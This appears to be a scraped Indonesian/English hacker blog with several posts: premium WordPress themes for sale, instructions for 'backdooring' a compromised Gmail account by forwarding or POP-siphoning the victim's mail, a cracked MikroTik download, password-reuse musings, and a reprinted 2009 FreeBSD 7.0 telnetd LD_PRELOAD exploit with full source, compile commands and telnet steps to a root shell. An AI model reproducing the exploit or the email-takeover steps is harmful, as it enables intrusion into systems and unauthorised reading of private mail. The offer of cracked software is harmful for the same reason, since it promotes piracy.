fl3xu5

My Crime Is That Of Curiosity

Do you want to check what time is it now ? you can use this link for check world time. this is useful for us , for example when we will order some stuff from others country in the world , and many more examples. This is the quote from world time server

Are you about to make an International long distance phone call? Are you planning a trip to a foreign destination? Are you preparing for a web cast or online meeting? Are you looking for a free clock for your own web site or blog? Just want to know what time it is? The Internet can bring locations around the world together, but with each place having different times, World Time Server is here to help!

Wordpress, yes i like wordpress for blogging, because it is simple and powerfull, beside that wordpress contains a lot of plugin that you can add / installed there . i use wordpress for my blog.  There are many developer for wordpress themes, start from free wordpress themes developer until premium wordpress themes developer. if you ever used free wordpress themes, it is nice to you try the premium one, because they are very smooth and beautful one .  Yes i think you are familiar with wordpress themes. i have some collections of premium  wordpress themes.  you can see the preview link or preview pics below :

k37z3c

Others preview you can open links below :

http://ithemes.com/

http://www.woothemes.com/demo/?t=16

http://www.wordpressnewspaper.com/

http://www.woothemes.com/demo/?t=10

http://wpthemes.blogohblog.net/index.php?wptheme=bobv3

http://demo.colorlabsproject.com/arthemia/%5d

http://www.elegantthemes.com/

And many more ……Ready stock premium wordpress themes, please Contact me  on YM or mail me if you want premium wordpress themes

Sebenarnya tulisan ini sengaja fl3xu5 buat untuk melanjutkan postingan sebelumnya,mengingat email termasuk hal yang penting atau bahkan sangat penting karena di dalamnya terdapat banyak informasi dari user tersebut, sebagai surat elektronik. Ya tidak hanya informasi mengenai accoutnt tapi juga bisa di email tersebut terdapat username password facebook, friendster, account, domain , account hosting , account paypal bahkan privasi data dari user tersebut, serta masih banyak informasi lainnya yang ada di email tersebut. Sebagai contoh, take over domain , take over hosting bisa dilakukan dengan mudah melalui login email user tersebut. Sangat mudah bukan ? dengan hanya search dengan keyword : username, password, domain, hosting, paypal, friendster, facebook di box email user tersebut setelah kita masuk ke dalam email user tersebut. Sangat menarik bukan ? dan sangat berbahaya tentunya . tapi itu memang kenyataan dan sangat sering terjadi. Lantas bagaimana dengan backdooring email ? misal via Gmail ? atau sering orang menyebut nya sebagai Gmail Rock ?.. Yap backdooring email juga bisa dilakukan saat kita sudah mendapatkan account email user tersebut. Contoh kasus saat kita user tersebut menggunakan email gmail dan kita jg menggunakan email gmail , kita tinggal menyettting nya, add account – Add another email address you own hingga kita bisa menerima dan mengirim dengan email user tersebut via box email kita yg di gmail. Sangat menarik bukan ? . atau yang lebih agak menarik lagi Add a mail account you own, sehingga kita bisa menyedot semua email yang ada di email user tersebut (use POP ), dari awal dia membuat email hingga beberapa waktu ke depan ? wah sangat nyaman dengan hanya login ke email gmail kita, kita juga bisa mendapatkan email yang masuk ke email user tersebut.

Ya kurang lebih seperti itu salah satu contoh gambaran backdooring email via gmail, dan tentunya masih banyak cara tips dan trik lain yang bisa di gali dan di explore lets explore your self and share here please .

Lantas apa hubungannya backdooring emai dengan judul postingan di atas ? ya ada sedikit hubungannya , simple say “dont forget to check your lastlogin ”,  Dengan mengecek last login email kita, kita akan mengetahui kapan kita login dan dari IP  mana kita login  Jika kita tidak merasa login dari IP tersebut pada waktu tersebut, ya bisa diindikasikan ada something wrong, ada yg login mgkn , atau ada yg minjem login secara diam2 atau sengaja login secara diam2 hehehee,. Cek last login bisa dijadikan salah satu cara untuk mengecek apakah email kita ada yg akses selain kita  . Lantas apa yang sebaiknya kita lakukan apabila kita mendapati account kita di login  orang lain, bisa dilihat dari last login tadi ? ya segera lah mengganti password.

Mungkin segitu dulu share dari fl3xu5, semoga bermanfaat .

Silahkan berbagi cerita mengenai hal tersebut diatas, baik pengalaman login ke email orang atau pun pengalaman di login oleh orang lain or else, lets share selagi masih ada hubungan degan topik ini

Terimakasih banyak sudah menyempatkan waktu untuk mampir blog fl3xu5 dan membaca postingan ini

*good night all Happy reading and always be carefull

alhamdulillah akhirnya fl3xu5 selesai juga re build indobacktrack dan forum indobacktrack. dan sedikit tampilan . namun forum masih tetap sama . content akan di update dalam waktu dekat. silahkan bagi yang mau join dengan indobacktrack dan forum indobacktrack . Lets share together . Mudah mudah an blog dan forum indobacktrack bisa bermanfaat bagi semua . amien .

Thanks to : yusuf, dhepe, qiandra,

Happy monday, I Like monday

Bagi yang tertarik dengan mikrotik , karena kemudahan dalam mengkonfigurasi via winbox , dan fitur yang lumayan lengkap, kali ini ada mikrotik versi 3.20 cracked, rekan rekan bisa download dari link ini.  bisa juga bergabung dengan forum mikroik. jadi keinget dulu  installasi dan konfigurasi server, proxy server, bandwith management di sini

versi lain dari mikrotik bisa di download di link ini juga

Have you installed backtrack 4 on your harddisk ? there is more rescource from internet about this. i just want to share how to install backtrack 4 on your harddsik , Please check this link for  more details

Seperti yang kta ketahui bersama, account terdiri dari banyak parameter diantaranya  username dan password, serta informasi laiinya  termasuk phone number, alamat, email dan lain2 ( seperti yang ada pada informasi Credit card ).  Informasi account tersebut sangat lah berharga.  Sesuai dengan judul postingan diatas,  “Satu password untuk semua ? amankah ?.” Amankah apabila kita menggunakan satu password untuk beberapa / semua account kita ? Misal password email sama dengan password friendster,atau password facebook ? atau mungkin bisa saja password tersebut sama dengan password kita untuk register di suau hosting atau domain ? . Ya masih banyak sekali jenis account yang ada . SIlahkan tambahkan sendiri, account apa saja yang anda miliki .

saya rasa banyak yang menggunakan satu password untuk semua account apakah perasaan saya ini benar ? hehee jawaban ada pasa masing – masing individu  jika benar , pasti merasa ya ya pasword saya sama semua qe3x

Lantas bagaimana if there is kiddy have owned one of your account ? so he could owned others one ?

tak peduli apakah itu strong password atau weak password . There is no privacy anymore

So what should we have to do ?

dont forget,always keep your account please

yaps tampaknya musti waspada bagi pengguna FreeBSD 7.0 Release karena ada satu exploit baru muncul dengan memanfaatkan daemon telnet, sehingga bisa melakukan escalating priveledge dan memungkinkan untuk mekalkukan “remote code execution”. More info

FreeBSD (7.0-RELEASE) telnet daemon local privilege escalation -
And possible remote root code excution.

There is a rather big bug in the current FreeBSD telnetd daemon.
The environment is not properly sanitized when execution /bin/login,
what leads to a (possible) remote root hole.

The telnet protocol allows to pass environment variables inside the
telnet traffic and assign them to the other side of the tcp connection.
The telnet daemon of FreeBSD does not check for LD_* (like LD_PRELOAD)
environment variables prior to executing /bin/login.
So passing an environment variable with the identifier LD_PRELOAD and
the value of a precompiled library that is on the filesystem of the
victims box that includes malicious code is possible.
When /bin/login is executed with the user id and group id 0 ('root') it preloads
the library that was set by remote connection through a telnet environment
definition and executes it.
It is unlikely that this bug can be exploited remotely but is not impossible.
An attacker could f.e. upload a malicious library using ftp (including anonymous
 ftp users), nfs, smb or any other (file) transfer protocol.
One scenario to exploit the bug remotely would be a ftp server running beside
the telnet daemon serving also anoynmous users with write access. Then the
attacker would upload the malicious library and defines the LD_PRELOAD
variable to something similar to /var/ftp/mallib.so to gain remote root access.

Here comes the actual exploit which can be executed with standard UNIX tools.
Paste this into a file using your favorite text editor:
---snip-----
# FreeBSD telnetd local/remote privilege escalation/code execution
# remote root only when accessible ftp or similar available
# tested on FreeBSD 7.0-RELEASE
# by Kingcope/2009

#include <unistd.h>
#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>

void _init() {
        FILE *f;
        setenv("LD_PRELOAD", "", 1);
        system("echo ALEX-ALEX;/bin/sh");
}
---snip-----

Then we compile this stuff.

---snip-----
#gcc -o program.o -c program.c -fPIC
#gcc -shared -Wl,-soname,libno_ex.so.1 -o libno_ex.so.1.0 program.o -nostartfiles
---snip-----

Then we copy the file to a known location (local root exploit)

---snip-----
#cp libno_ex.so.1.0 /tmp/libno_ex.so.1.0
---snip-----

...or we upload the library through any other available attack vector.
After that we telnet to the remote or local FreeBSD telnet daemon
with setting the LD_PRELOAD environment variable to the known location
as a telnet option before.

---snip-----
#telnet
>auth disable SRA
>environ define LD_PRELOAD /tmp/libno_ex.so.1.0
>open target
---snip-----
ALEX-ALEX
#ROOTSHELL

This will give us an immediate (probably remote) root shell.
This exploit is only verified on a FreeBSD 7.0-RELEASE fresh install
with telnetd enabled. Other version of FreeBSD may also be affected,
OpenBSD and NetBSD where not tested but MAY contain the same bug because
of historic reasons.

Signed,
Kingcope[nikolaos rangos]/2009

# milw0rm.com [2009-02-16]

thinking how to become a rich man is more interesting than woman.

Lets discuss together if you interest about that statement. Please for free to give an argument (Pro / Kontra). for man or woman .. ALL welcome

use english or indonesian language is ok

Dear all backtrack ers, especially indonesian backtrack’ers (shout to indobacktrack ),  after i posted backtrack4 shmoo release,  i want to share you the ‘local mirror (IIX ) to download that iso.”. Dont miss it, lets download . i’d like to thanks to yusuf, xnuxer, and gilaupload . You can see this info at indobacktrack.

You can download from this link :

- Yusuf gilaupload,

- Beta Gilaupload,

- Xnuxer

-  http://119.2.43.123:8080/files/BT4_Beta.iso

Happy using backtrack !